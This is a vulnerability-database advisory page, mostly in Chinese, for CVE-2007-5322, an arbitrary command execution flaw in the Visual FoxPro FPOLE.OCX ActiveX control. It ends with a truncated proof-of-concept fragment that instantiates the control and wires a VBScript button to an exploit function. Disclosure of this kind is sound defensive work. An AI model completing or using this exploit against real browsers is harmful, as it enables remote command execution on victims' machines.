Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:2339
HistoryOct 28, 2007 - 12:00 a.m.

Microsoft Visual FoxPro FPOLE.OCX ActiveX控件任意命令执行漏洞

2007-10-2800:00:00
Root
www.seebug.org
21

0.716 High

EPSS

Percentile

97.7%

JSON

BUGTRAQ ID: 25977
CVE(CAN) ID: CVE-2007-5322

Visual FoxPro是微软发布的数据库开发工具。

Visual FoxPro的FPOLE.OCX ActiveX控件没有正确地验证对FoxDoCmd()方式的输入,如果用户受骗访问了恶意站点的话,就可能导致在浏览器会话中执行任意指令。

Microsoft Visual FoxPro 6.0
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://www.microsoft.com/technet/security/” target=“_blank”>http://www.microsoft.com/technet/security/</a>


                                                &lt;object&nbsp;classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F'&nbsp;id='test'&gt;&lt;/object&gt;

&lt;input&nbsp;language=VBScript&nbsp;onclick=tryMe()&nbsp;type=button&nbsp;value='Click&nbsp;here&nbsp;to&nbsp;start&nbsp;the&nbsp;

Related

cve 1
prion 1
nessus 1
cve
cve
CVE-2007-5322
2007-10-09 22:17:00
prion
prion
Design/Logic Flaw
2007-10-09 22:17:00
nessus
nessus
MS08-010: Cumulative Security Update for Internet Explorer (944533)
2008-02-12 00:00:00

0.716 High

EPSS

Percentile

97.7%

JSON
Related for SSV:2339
cve1prion1nessus1